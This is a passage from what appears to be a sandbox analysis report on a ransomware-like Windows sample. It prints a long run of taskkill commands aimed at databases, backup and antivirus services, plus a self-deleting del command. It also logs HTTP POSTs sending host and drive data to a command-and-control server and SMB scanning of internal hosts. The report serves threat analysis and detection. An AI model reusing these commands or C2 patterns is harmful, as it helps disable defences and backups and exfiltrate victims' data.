    taskkill /F /T /IM sqlmangr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM RAgui*
  2⤵
  PID:736
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM RAgui*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1204
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM supervise*
  2⤵
  PID:1356
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM supervise*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1108
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Culture*
  2⤵
  PID:1288
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Culture*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1500
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Defwatch*
  2⤵
  PID:1528
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Defwatch*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1592
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM winword*
  2⤵
  PID:1684
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM winword*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1340
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBW32*
  2⤵
  PID:1336
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBW32*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1844
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBDBMgr*
  2⤵
  PID:1764
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBDBMgr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1872
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM qbupdate*
  2⤵
  PID:1572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM qbupdate*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1668
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM axlbridge*
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM axlbridge*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1964
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM httpd*
  2⤵
  PID:1892
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM httpd*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:524
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM fdlauncher*
  2⤵
  PID:1948
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM fdlauncher*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:944
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MsDtSrvr*
  2⤵
  PID:668
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MsDtSrvr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:844
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM java*
  2⤵
  PID:1088
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM java*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1044
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM 360se*
  2⤵
  PID:1548
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM 360se*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1512
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM 360doctor*
  2⤵
  PID:1008
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM 360doctor*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1816
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM wdswfsafe*
  2⤵
  PID:1792
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM wdswfsafe*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1808
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM fdhost*
  2⤵
  PID:1336
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM fdhost*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1632
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM GDscan*
  2⤵
  PID:1848
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM GDscan*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1880
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM ZhuDongFangYu*
  2⤵
  PID:1908
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM ZhuDongFangYu*
    3⤵
    - Kills process with taskkill
    PID:1960
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBDBMgrN*
  2⤵
  PID:2000
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBDBMgrN*
    3⤵
    - Kills process with taskkill
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM mysqld*
  2⤵
  PID:468
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM mysqld*
    3⤵
    - Kills process with taskkill
    PID:1204
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM AutodeskDesktopApp*
  2⤵
  PID:564
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM AutodeskDesktopApp*
    3⤵
    - Kills process with taskkill
    PID:1356
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM acwebbrowser*
  2⤵
  PID:480
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM acwebbrowser*
    3⤵
    - Kills process with taskkill
    PID:1500
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Creative Cloud*
  2⤵
  PID:824
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Creative Cloud*
    3⤵
    PID:1592
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Adobe Desktop Service*
  2⤵
  PID:1504
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Adobe Desktop Service*
    3⤵
    PID:1516
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM CoreSync*
  2⤵
  PID:1480
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM CoreSync*
    3⤵
    - Kills process with taskkill
    PID:1004
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Adobe CEF Helper*
  2⤵
  PID:1812
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Adobe CEF Helper*
    3⤵
    - Kills process with taskkill
    PID:1520
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM node*
  2⤵
  PID:1780
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM node*
    3⤵
    - Kills process with taskkill
    PID:1736
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM AdobeIPCBroker*
  2⤵
  PID:1628
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM AdobeIPCBroker*
    3⤵
    PID:1576
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sync-taskbar*
  2⤵
  PID:1888
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sync-taskbar*
    3⤵
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sync-worker*
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sync-worker*
    3⤵
    - Kills process with taskkill
    PID:652
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM InputPersonalization*
  2⤵
  PID:432
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM InputPersonalization*
    3⤵
    - Kills process with taskkill
    PID:1176
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM AdobeCollabSync*
  2⤵
  PID:1152
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM AdobeCollabSync*
    3⤵
    - Kills process with taskkill
    PID:1116
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM BrCtrlCntr*
  2⤵
  PID:1472
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM BrCtrlCntr*
    3⤵
    - Kills process with taskkill
    PID:316
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM BrCcUxSys*
  2⤵
  PID:1604
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM BrCcUxSys*
    3⤵
    - Kills process with taskkill
    PID:1552
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SimplyConnectionManager*
  2⤵
  PID:1796
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SimplyConnectionManager*
    3⤵
    - Kills process with taskkill
    PID:1824
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Simply.SystemTrayIcon*
  2⤵
  PID:1832
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Simply.SystemTrayIcon*
    3⤵
    - Kills process with taskkill
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM fbguard*
  2⤵
  PID:1808
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM fbguard*
    3⤵
    - Kills process with taskkill
    PID:1396
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM fbserver*
  2⤵
  PID:1764
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM fbserver*
    3⤵
    - Kills process with taskkill
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM ONENOTEM*
  2⤵
  PID:1584
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM ONENOTEM*
    3⤵
    - Kills process with taskkill
    PID:1972
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM wrapper*
  2⤵
  PID:1580
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM wrapper*
    3⤵
    PID:520
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM DefWatch*
  2⤵
  PID:1884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM DefWatch*
    3⤵
    PID:1124
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM ccEvtMgr*
  2⤵
  PID:944
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM ccEvtMgr*
    3⤵
    - Kills process with taskkill
    PID:564
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM ccSetMgr*
  2⤵
  PID:864
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM ccSetMgr*
    3⤵
    - Kills process with taskkill
    PID:364
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SavRoam*
  2⤵
  PID:1088
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SavRoam*
    3⤵
    - Kills process with taskkill
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Sqlservr*
  2⤵
  PID:1560
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Sqlservr*
    3⤵
    PID:1800
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sqlagent*
  2⤵
  PID:1504
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sqlagent*
    3⤵
    PID:1812
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sqladhlp*
  2⤵
  PID:1684
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sqladhlp*
    3⤵
    - Kills process with taskkill
    PID:1736
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Culserver*
  2⤵
  PID:1768
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Culserver*
    3⤵
    PID:1572
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM RTVscan*
  2⤵
  PID:1964
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM RTVscan*
    3⤵
    - Kills process with taskkill
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sqlbrowser*
  2⤵
  PID:1892
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sqlbrowser*
    3⤵
    - Kills process with taskkill
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLADHLP*
  2⤵
  PID:1968
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLADHLP*
    3⤵
    PID:1176
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBIDPService*
  2⤵
  PID:668
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBIDPService*
    3⤵
    - Kills process with taskkill
    PID:844
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Intuit.QuickBooks.FCS*
    3⤵
    - Kills process with taskkill
    PID:1056
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBCFMonitorService*
  2⤵
  PID:1528
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBCFMonitorService*
    3⤵
    - Kills process with taskkill
    PID:824
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sqlwriter*
  2⤵
  PID:860
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sqlwriter*
    3⤵
    PID:1196
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM msmdsrv*
  2⤵
  PID:1480
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM msmdsrv*
    3⤵
    - Kills process with taskkill
    PID:1772
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM tomcat6*
  2⤵
  PID:1740
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM tomcat6*
    3⤵
    PID:1396
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM zhudongfangyu*
  2⤵
  PID:1568
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM zhudongfangyu*
    3⤵
    - Kills process with taskkill
    PID:1668
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM vmware-usbarbitator64*
  2⤵
  PID:1880
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM vmware-usbarbitator64*
    3⤵
    - Kills process with taskkill
    PID:1584
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM vmware-converter*
  2⤵
  PID:1888
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM vmware-converter*
    3⤵
    PID:1976
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM dbsrv12*
  2⤵
  PID:2024
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM dbsrv12*
    3⤵
    PID:1360
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM dbeng8*
  2⤵
  PID:432
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM dbeng8*
    3⤵
    - Kills process with taskkill
    PID:2044
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
  2⤵
  PID:1108
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##WID*
    3⤵
    - Kills process with taskkill
    PID:1440
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*
  2⤵
  PID:1472
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$VEEAMSQL2012*
    3⤵
    - Kills process with taskkill
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
  2⤵
  PID:1604
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
    3⤵
    - Kills process with taskkill
    PID:1824
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLBrowser*
  2⤵
  PID:1796
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLBrowser*
    3⤵
    - Kills process with taskkill
    PID:1776
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLWriter*
  2⤵
  PID:1004
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLWriter*
    3⤵
    - Kills process with taskkill
    PID:1684
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM FishbowlMySQL*
  2⤵
  PID:1644
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM FishbowlMySQL*
    3⤵
    - Kills process with taskkill
    PID:1768
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
  2⤵
  PID:1764
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##WID*
    3⤵
    - Kills process with taskkill
    PID:1964
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MySQL57*
  2⤵
  PID:1960
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MySQL57*
    3⤵
    - Kills process with taskkill
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
    3⤵
    PID:736
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLServerADHelper100*
  2⤵
  PID:1204
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQLServerADHelper100*
    3⤵
    - Kills process with taskkill
    PID:668
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
  2⤵
  PID:1356
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
    3⤵
    - Kills process with taskkill
    PID:1500
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM msftesql-Exchange*
  2⤵
  PID:316
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM msftesql-Exchange*
    3⤵
    PID:1528
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
  2⤵
  PID:1452
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
    3⤵
    - Kills process with taskkill
    PID:1800
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*
  2⤵
  PID:1820
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$SBSMONITORING*
    3⤵
    - Kills process with taskkill
    PID:1788
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*
  2⤵
  PID:1828
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$SHAREPOINT*
    3⤵
    - Kills process with taskkill
    PID:1876
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
  2⤵
  PID:1336
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
    3⤵
    - Kills process with taskkill
    PID:1872
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
  2⤵
  PID:1644
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
    3⤵
    PID:1924
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLAgent$SBSMONITORING*
    3⤵
    PID:1580
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*
  2⤵
  PID:268
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLAgent$SHAREPOINT*
    3⤵
    PID:704
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBFCService*
  2⤵
  PID:1884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBFCService*
    3⤵
    - Kills process with taskkill
    PID:1076
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBVSS*
  2⤵
  PID:832
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBVSS*
    3⤵
    - Kills process with taskkill
    PID:1508
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C timeout /T 15 /NOBREAK && del "C:\Users\Admin\AppData\Local\Temp\7e415d5a1b1235491cb698eb14817d31.exe" /F
  2⤵
  - Deletes itself
  PID:892
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 15 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:844

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1072

Network

POST

http://217.8.117.26/gateinfo

7e415d5a1b1235491cb698eb14817d31.exe

Remote address:

217.8.117.26:80

Request

POST /gateinfo HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: 217.8.117.26
Content-Length: 4097
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 1
ETag: W/"1-NWoZK3kTsExUV00Ywo1G5jlUKKs"
Set-Cookie: connect.sid=s%3A03540d88-2f84-4773-856b-52c9ec6df7f3.eLRB9HNv7xH6FcFqhBNN4j1Jqmpd8MAHNHmJN%2BiDxvc; Path=/; HttpOnly
Date: Fri, 24 Jul 2020 12:53:49 GMT
Connection: keep-alive
POST

http://217.8.117.26/gateinfo

7e415d5a1b1235491cb698eb14817d31.exe

Remote address:

217.8.117.26:80

Request

POST /gateinfo HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: 217.8.117.26
Content-Length: 4097
Cache-Control: no-cache
Cookie: connect.sid=s%3A03540d88-2f84-4773-856b-52c9ec6df7f3.eLRB9HNv7xH6FcFqhBNN4j1Jqmpd8MAHNHmJN%2BiDxvc

Response

HTTP/1.1 200 OK

X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 1
ETag: W/"1-NWoZK3kTsExUV00Ywo1G5jlUKKs"
Date: Fri, 24 Jul 2020 12:53:50 GMT
Connection: keep-alive
POST

http://217.8.117.26/gatedrives

7e415d5a1b1235491cb698eb14817d31.exe

Remote address:

217.8.117.26:80

Request

POST /gatedrives HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: 217.8.117.26
Content-Length: 975
Cache-Control: no-cache
Cookie: connect.sid=s%3A03540d88-2f84-4773-856b-52c9ec6df7f3.eLRB9HNv7xH6FcFqhBNN4j1Jqmpd8MAHNHmJN%2BiDxvc

Response

HTTP/1.1 200 OK

X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 1
ETag: W/"1-NWoZK3kTsExUV00Ywo1G5jlUKKs"
Date: Fri, 24 Jul 2020 12:54:54 GMT
Connection: keep-alive
DNS

dns.msftncsi.com

Remote address:

8.8.8.8:53

Request

dns.msftncsi.com

IN A

Response

dns.msftncsi.com

IN A

131.107.255.255
DNS

dns.msftncsi.com

Remote address:

8.8.8.8:53

Request

dns.msftncsi.com

IN AAAA

Response

dns.msftncsi.com

IN AAAA

fd3e:4f5a:5b81::1

217.8.117.26:80

http://217.8.117.26/gateinfo

http

7e415d5a1b1235491cb698eb14817d31.exe

11.2kB
1.1kB
22
13

HTTP Request

POST http://217.8.117.26/gateinfo

HTTP Response

200

HTTP Request

POST http://217.8.117.26/gateinfo

HTTP Response

200
10.7.0.1:135

7e415d5a1b1235491cb698eb14817d31.exe

152 B
3
10.7.0.171:135

7e415d5a1b1235491cb698eb14817d31.exe

104 B
2
10.7.0.179:135

7e415d5a1b1235491cb698eb14817d31.exe

104 B
2
10.7.0.1:445

7e415d5a1b1235491cb698eb14817d31.exe

152 B
3
10.7.0.1:139

7e415d5a1b1235491cb698eb14817d31.exe

152 B
3
217.8.117.26:80

http://217.8.117.26/gatedrives

http

7e415d5a1b1235491cb698eb14817d31.exe

1.6kB
416 B
6
5

HTTP Request

POST http://217.8.117.26/gatedrives

HTTP Response

200
10.7.0.156:135

7e415d5a1b1235491cb698eb14817d31.exe
10.7.0.171:445

7e415d5a1b1235491cb698eb14817d31.exe
10.7.0.179:445

7e415d5a1b1235491cb698eb14817d31.exe
10.7.0.156:445

7e415d5a1b1235491cb698eb14817d31.exe
10.7.0.171:139

7e415d5a1b1235491cb698eb14817d31.exe
10.7.0.179:139

7e415d5a1b1235491cb698eb14817d31.exe
10.7.0.156:139

7e415d5a1b1235491cb698eb14817d31.exe

224.0.0.252:5355

100 B
2
10.7.0.255:137

netbios-ns

234 B
3
239.255.255.250:1900

966 B
6
8.8.8.8:53

dns.msftncsi.com

dns

62 B
78 B
1
1

DNS Request

dns.msftncsi.com

DNS Response

131.107.255.255
8.8.8.8:53

dns.msftncsi.com

dns

62 B
90 B
1
1

DNS Request

dns.msftncsi.com

DNS Response

fd3e:4f5a:5b81::1
239.255.255.250:1900

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.